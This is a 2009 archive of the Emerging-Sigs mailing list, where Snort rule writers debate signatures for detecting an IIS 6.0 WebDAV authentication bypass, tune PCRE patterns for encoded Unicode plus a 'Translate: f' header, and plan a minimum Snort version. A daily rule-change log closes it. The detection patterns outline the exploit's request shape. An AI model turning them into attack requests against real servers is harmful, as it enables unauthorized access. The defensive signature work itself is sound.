From wkitty42 at windstream.net  Thu May 21 09:55:06 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Thu, 21 May 2009 09:55:06 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <cf939bff0905201856y35f825a8y7740bff79cb20179@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>	<1242865846.97653.27.camel@localhost>	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>	<1242869674.97653.50.camel@localhost>	<cf939bff0905201845u2d5ed646r422d3408eb7634b4@mail.gmail.com>	<1242870380.97653.51.camel@localhost>
	<cf939bff0905201856y35f825a8y7740bff79cb20179@mail.gmail.com>
Message-ID: <4A155D3A.3020604@windstream.net>

Joshua Gimer wrote:
> Version 2.8.3.2 (Build 22)
> 
> Initializing rule chains...
> 6633 Snort rules read
>     6633 detection rules
>     0 decoder rules
>     0 preprocessor rules
> 6633 Option Chains linked into 339 Chain Headers
> 0 Dynamic rules

you must not be using the netbios.rules, either?? that version pukes all over 
the netbios.rules using the dce_iface keyword... all 104 of them :?

-- 
        _\/
       (@@)                      Waldo Kitty, Waldo's Place USA
__ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com
_|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com
____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com
_|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net

From mcholste at gmail.com  Thu May 21 10:04:57 2009
From: mcholste at gmail.com (Martin Holste)
Date: Thu, 21 May 2009 09:04:57 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242871195.97653.55.camel@localhost>
	<9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
Message-ID: <df9074860905210704n69e5b811tacca866bf48ccefc@mail.gmail.com>

The resounding answer I got when I posed the same question a few months ago
was that ET rules wouldn't allow the new http content modifiers because they
required modern versions of Snort (>= 2.8.3, I think) and would therefore
break some user's implementations.  I propose that a sunset date be created
so that everyone can work to a date when a given version will become the
standard.

Because:

What I think many are forgetting regarding the performance of various
content matches is that the http preproc is already doing a lot of pattern
matching on _every_ packet it detects as HTTP.  Specifically, in order to
extract the HTTP method used, the basic equivalent of a 'content: "GET /"'
is being applied whether you tell it to or not.  Then it does the matching
to extract the URI, etc.  So, we should leverage what has already been
parsed and extracted as much as possible, and that will certainly give you a
performance boost.

The other thing for those of you who haven't ventured into too much of the
performance tuning arena is to really pay attention to what pattern matcher
you are using under the "config detection" directive.  There is a huge, huge
performance difference on a busy network between ac-bnfa and ac, and a
corresponding amount of RAM required.  My limited understanding is that the
more of the ac tree you load into memory, the farther down the matching tree
you can go before the processor has to really do work.  And please, if
you're still using the Boyer-Moore matcher (lowmem), stop!  Aho-Corasick
uses more of a binary search tree (Comp Sci Ph.D.'s please step in any time
here) approach whereas Boyer-Moore takes the longest string, and for every
2x increment of the string length, checks to see if the middle of the 2x
increment is the last letter of the pattern, so it proceeds more like what
Frank was describing.

Thanks,

Martin

On Wed, May 20, 2009 at 11:26 PM, Rodrigo Montoro(Sp0oKeR) <
spooker at gmail.com> wrote:

> Since I saw them at snort 2.8.3 release I never see people using them
> to create rules (thats include myself).
>
> 2008-09-04 - Snort 2.8.3
>
> [*] New Additions
>    * New Feature for HTTP Inspect to split requests into 5 components -
>      Method, URI, Header (non-cookie), Cookies, Body.
>
>
>
> http_method (
> http://www.snort.org/docs/snort_htmanuals/htmanual_284/node257.html
> ) keyword and http_headers (
> http://www.snort.org/docs/snort_htmanuals/htmanual_284/node254.html )
> .
>
> My question is: don't those keywords improve performance ?
>
>
> Regards,
>
>
> On Wed, May 20, 2009 at 10:59 PM, Frank Knobbe <frank at knobbe.us> wrote:
> > On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> >> Adapting the rules to other methods should be easy enough, maybe
> something like:
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> >> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
> >> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
> >> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> >> rev:1;)
> >
> >
> > I just ran it for a 3 minutes on my sensors and had to immediately pull
> > it :)  Sorry, just way too many FP's since it fires on legitimate
> > encodings (like "help%20%20me"  :)
> >
> >
> > Sorry, as I had thought yesterday, we need sigs for the dangerous
> > Unicode versions. %..%.. simply isn't cutting it :)
> >
> >
> > Cheers,
> > Frank
> >
> >
> > PS: That said, the VRT rule created more FP's :)
> >
> >
> > --
> > It is said that the Internet is a public utility. As such, it is best
> > compared to a sewer. A big, fat pipe with a bunch of crap sloshing
> > against your ports.
> >
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> >
>
>
>
> --
> ===========================
> Rodrigo Montoro (Sp0oKeR)
> http://www.spooker.com.br
> http://www.snort.org.br
> http://www.linkedin.com/in/spooker
> ===========================
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/007dd357/attachment-0001.html

From shirkdog_list at hotmail.com  Thu May 21 10:53:01 2009
From: shirkdog_list at hotmail.com (Shirk Dog)
Date: Thu, 21 May 2009 10:53:01 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242871195.97653.55.camel@localhost> 
	<314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com>
Message-ID: <BAY109-W240E102ACD23BC30F41EB195590@phx.gbl>


PCRE FAIL
pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi";

Watch your DOTS
pcre:"/(?:GET|PUT|HEAD)[^\n]*?\x25\x2e\x2e\x25[^\n]*?HTTP/i"


Joel and I already had a discussion about my broken thinking of the 'B' modifier and rawbytes. In reality, the http_preproc will process ALL HTTP traffic, as well as the processing that is done through the rule-chain. The normalization does not impact the rule-chain detection. This is the reason he offered to test the HTTP traffic, as our discussion made him as giddy as a school girl. He likes to help :)


Shirkdog
Free your mind...
http://www.shirkdog.us



Date: Thu, 21 May 2009 08:54:19 -0400
From: eslerj at gmail.com
To: frank at knobbe.us
CC: emerging-sigs at emergingthreats.net
Subject: Re: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass

On Wed, May 20, 2009 at 9:59 PM, Frank Knobbe <frank at knobbe.us> wrote:

On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:

> Adapting the rules to other methods should be easy enough, maybe something like:

>

> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote

> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;

> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";

> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;

> rev:1;)





I just ran it for a 3 minutes on my sensors and had to immediately pull

it :)  Sorry, just way too many FP's since it fires on legitimate

encodings (like "help%20%20me"  :)





Sorry, as I had thought yesterday, we need sigs for the dangerous

Unicode versions. %..%.. simply isn't cutting it :)





This is why the http_inspect preprocessor was recommended, there isn't need for a rule in this situation, there is need for code already in place.  The same reason why writing rules for USER.*{100} in FTP rules is stupid, the ftp preprocessor does this for you. 



-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974

_________________________________________________________________
Hotmail? goes with you. 
http://windowslive.com/Tutorial/Hotmail/Mobile?ocid=TXT_TAGLM_WL_HM_Tutorial_Mobile1_052009
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/ead50ca4/attachment.html

From frank at knobbe.us  Thu May 21 11:00:29 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Thu, 21 May 2009 10:00:29 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <BAY109-W240E102ACD23BC30F41EB195590@phx.gbl>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242871195.97653.55.camel@localhost>
	<314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com>
	<BAY109-W240E102ACD23BC30F41EB195590@phx.gbl>
Message-ID: <1242918029.6787.14.camel@localhost>

On Thu, 2009-05-21 at 10:53 -0400, Shirk Dog wrote:
> PCRE FAIL
> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi";
> 
> Watch your DOTS
> pcre:"/(?:GET|PUT|HEAD)[^\n]*?\x25\x2e\x2e\x25[^\n]*?HTTP/i"
> 


It doesn't matter. The design was to capture %, two chars, and %.
Without a limitation on the actual Unicodes themselves, you will match
on any legitimate traffic, like %20%20. That incurs a ton of FP's. You
might as well run ngrep :)

To make this rule successful, you have to match on the possible hostile
Unicode values themselves. Everything else misses the mark.

Cheers,
Frank


-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/f676ce3a/attachment.bin

From shirkdog_list at hotmail.com  Thu May 21 11:40:30 2009
From: shirkdog_list at hotmail.com (Shirk Dog)
Date: Thu, 21 May 2009 11:40:30 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242918029.6787.14.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242871195.97653.55.camel@localhost>
	<314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com>
	<BAY109-W240E102ACD23BC30F41EB195590@phx.gbl> 
	<1242918029.6787.14.camel@localhost>
Message-ID: <BAY109-W29E42F976837F87AB9A0C195590@phx.gbl>


Right, that is what Dan Roelker did. :)

Shirkdog
Free your mind...
http://www.shirkdog.us



> Subject: RE: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
> From: frank at knobbe.us
> To: shirkdog_list at hotmail.com
> CC: eslerj at gmail.com; emerging-sigs at emergingthreats.net
> Date: Thu, 21 May 2009 10:00:29 -0500
> 
> On Thu, 2009-05-21 at 10:53 -0400, Shirk Dog wrote:
> > PCRE FAIL
> > pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi";
> > 
> > Watch your DOTS
> > pcre:"/(?:GET|PUT|HEAD)[^\n]*?\x25\x2e\x2e\x25[^\n]*?HTTP/i"
> > 
> 
> 
> It doesn't matter. The design was to capture %, two chars, and %.
> Without a limitation on the actual Unicodes themselves, you will match
> on any legitimate traffic, like %20%20. That incurs a ton of FP's. You
> might as well run ngrep :)
> 
> To make this rule successful, you have to match on the possible hostile
> Unicode values themselves. Everything else misses the mark.
> 
> Cheers,
> Frank
> 
> 
> -- 
> It is said that the Internet is a public utility. As such, it is best
> compared to a sewer. A big, fat pipe with a bunch of crap sloshing
> against your ports.
> 

_________________________________________________________________
Hotmail? goes with you. 
http://windowslive.com/Tutorial/Hotmail/Mobile?ocid=TXT_TAGLM_WL_HM_Tutorial_Mobile1_052009
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/c1226b0b/attachment.html

From frank at knobbe.us  Thu May 21 11:45:03 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Thu, 21 May 2009 10:45:03 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <BAY109-W29E42F976837F87AB9A0C195590@phx.gbl>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242871195.97653.55.camel@localhost>
	<314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com>
	<BAY109-W240E102ACD23BC30F41EB195590@phx.gbl>
	<1242918029.6787.14.camel@localhost>
	<BAY109-W29E42F976837F87AB9A0C195590@phx.gbl>
Message-ID: <1242920703.6787.28.camel@localhost>

On Thu, 2009-05-21 at 11:40 -0400, Shirk Dog wrote:
> Right, that is what Dan Roelker did. :)

Yup. But sadly even that produced a lot of false positives :(

-Frank



-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/abad7f0d/attachment.bin

From jonkman at jonkmans.com  Thu May 21 12:18:13 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 21 May 2009 12:18:13 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <df9074860905210704n69e5b811tacca866bf48ccefc@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>	<1242865846.97653.27.camel@localhost>	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>	<1242871195.97653.55.camel@localhost>	<9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
	<df9074860905210704n69e5b811tacca866bf48ccefc@mail.gmail.com>
Message-ID: <4A157EC5.4030501@jonkmans.com>

You're right Martin, we're avoiding the newest directives when there is
an alternative for the time being to avoid breaking older installs.

We do need a sunset date though. We could really optimize the malware
http sigs with the new uri stuff.

What does everyone think is a reasonable time for upgrading? How about
we say we start going to 2.8.3+ directives on July 1 2009?

Matt

Martin Holste wrote:
> The resounding answer I got when I posed the same question a few months
> ago was that ET rules wouldn't allow the new http content modifiers
> because they required modern versions of Snort (>= 2.8.3, I think) and
> would therefore break some user's implementations.  I propose that a
> sunset date be created so that everyone can work to a date when a given
> version will become the standard.
> 
> Because:
> 
> What I think many are forgetting regarding the performance of various
> content matches is that the http preproc is already doing a lot of
> pattern matching on _every_ packet it detects as HTTP.  Specifically, in
> order to extract the HTTP method used, the basic equivalent of a
> 'content: "GET /"' is being applied whether you tell it to or not.  Then
> it does the matching to extract the URI, etc.  So, we should leverage
> what has already been parsed and extracted as much as possible, and that
> will certainly give you a performance boost.
> 
> The other thing for those of you who haven't ventured into too much of
> the performance tuning arena is to really pay attention to what pattern
> matcher you are using under the "config detection" directive.  There is
> a huge, huge performance difference on a busy network between ac-bnfa
> and ac, and a corresponding amount of RAM required.  My limited
> understanding is that the more of the ac tree you load into memory, the
> farther down the matching tree you can go before the processor has to
> really do work.  And please, if you're still using the Boyer-Moore
> matcher (lowmem), stop!  Aho-Corasick uses more of a binary search tree
> (Comp Sci Ph.D.'s please step in any time here) approach whereas
> Boyer-Moore takes the longest string, and for every 2x increment of the
> string length, checks to see if the middle of the 2x increment is the
> last letter of the pattern, so it proceeds more like what Frank was
> describing.
> 
> Thanks,
> 
> Martin
> 
> On Wed, May 20, 2009 at 11:26 PM, Rodrigo Montoro(Sp0oKeR)
> <spooker at gmail.com <mailto:spooker at gmail.com>> wrote:
> 
>     Since I saw them at snort 2.8.3 release I never see people using them
>     to create rules (thats include myself).
> 
>     2008-09-04 - Snort 2.8.3
> 
>     [*] New Additions
>        * New Feature for HTTP Inspect to split requests into 5 components -
>          Method, URI, Header (non-cookie), Cookies, Body.
> 
> 
> 
>     http_method (
>     http://www.snort.org/docs/snort_htmanuals/htmanual_284/node257.html
>     ) keyword and http_headers (
>     http://www.snort.org/docs/snort_htmanuals/htmanual_284/node254.html )
>     .
> 
>     My question is: don't those keywords improve performance ?
> 
> 
>     Regards,
> 
> 
>     On Wed, May 20, 2009 at 10:59 PM, Frank Knobbe <frank at knobbe.us
>     <mailto:frank at knobbe.us>> wrote:
>     > On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
>     >> Adapting the rules to other methods should be easy enough, maybe
>     something like:
>     >>
>     >> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav
>     Remote
>     >> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
>     >> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
>     >> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004
>     <http://isc.sans.org/diary.html?storyid=6397;sid:1000004>;
>     >> rev:1;)
>     >
>     >
>     > I just ran it for a 3 minutes on my sensors and had to immediately
>     pull
>     > it :)  Sorry, just way too many FP's since it fires on legitimate
>     > encodings (like "help%20%20me"  :)
>     >
>     >
>     > Sorry, as I had thought yesterday, we need sigs for the dangerous
>     > Unicode versions. %..%.. simply isn't cutting it :)
>     >
>     >
>     > Cheers,
>     > Frank
>     >
>     >
>     > PS: That said, the VRT rule created more FP's :)
>     >
>     >
>     > --
>     > It is said that the Internet is a public utility. As such, it is best
>     > compared to a sewer. A big, fat pipe with a bunch of crap sloshing
>     > against your ports.
>     >
>     >
>     > _______________________________________________
>     > Emerging-sigs mailing list
>     > Emerging-sigs at emergingthreats.net
>     <mailto:Emerging-sigs at emergingthreats.net>
>     > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>     >
>     >
> 
> 
> 
>     --
>     ===========================
>     Rodrigo Montoro (Sp0oKeR)
>     http://www.spooker.com.br
>     http://www.snort.org.br
>     http://www.linkedin.com/in/spooker
>     ===========================
>     _______________________________________________
>     Emerging-sigs mailing list
>     Emerging-sigs at emergingthreats.net
>     <mailto:Emerging-sigs at emergingthreats.net>
>     http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From Raymond.Pesek at ThirdFederal.com  Thu May 21 12:27:28 2009
From: Raymond.Pesek at ThirdFederal.com (Raymond Pesek)
Date: Thu, 21 May 2009 12:27:28 -0400
Subject: [Emerging-Sigs] Sunset date for older versions of Snort using ET
	rules
In-Reply-To: <4A157EC5.4030501@jonkmans.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242871195.97653.55.camel@localhost>
	<9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
	<df9074860905210704n69e5b811tacca866bf48ccefc@mail.gmail.com>
	<4A157EC5.4030501@jonkmans.com>
Message-ID: <C8F5391691E64D439145C73F776E966602584AEB5481@TFSCMS01.thirdfed.thirdfederal.local>

I changed the Subject to make it more pertinent.

July 1 2009 is fine with me.

I'd suggest keeping an archive of June 30th that people can download if needed for some reason.

Is there some reason we could not use 2.8.4 as the minimum version instead?

Ray

-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Matt Jonkman
Sent: Thursday, May 21, 2009 12:18 PM
To: Martin Holste
Cc: emerging-sigs at emergingthreats.net; Frank Knobbe
Subject: Re: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass

You're right Martin, we're avoiding the newest directives when there is
an alternative for the time being to avoid breaking older installs.

We do need a sunset date though. We could really optimize the malware
http sigs with the new uri stuff.

What does everyone think is a reasonable time for upgrading? How about
we say we start going to 2.8.3+ directives on July 1 2009?

Matt

Please consider the environment before printing this email message.


From emerging at emergingthreats.net  Thu May 21 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu, 21 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090521200011.97AEE4504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Thu May 21 16:00:11 2009 [***]

[///]     Modified active rules:     [///]

 2006371 - ET P2P BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) (emerging-p2p.rules)
 2006372 - ET P2P Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) (emerging-p2p.rules)
 2006375 - ET P2P Bittorrent P2P Client HTTP Request  (emerging-p2p.rules)
 2006379 - ET P2P BearShare P2P Gnutella Client HTTP Request  (emerging-p2p.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (4):
        2006371 || ET P2P BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006371
        2006372 || ET P2P Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006372
        2006375 || ET P2P Bittorrent P2P Client HTTP Request  || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006375
        2006379 || ET P2P BearShare P2P Gnutella Client HTTP Request  || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006379

     -> Added to emerging-sid-msg.map.txt (4):
        2006371 || ET P2P BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006371
        2006372 || ET P2P Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006372
        2006375 || ET P2P Bittorrent P2P Client HTTP Request  || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006375
        2006379 || ET P2P BearShare P2P Gnutella Client HTTP Request  || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006379

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (44):
        2006371 || ET MALWARE BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006371
        2006372 || ET MALWARE Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006372
        2006375 || ET MALWARE Bittorrent P2P Client HTTP Request  || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006375
        2006379 || ET MALWARE BearShare P2P Gnutella Client HTTP Request  || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006379
        2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
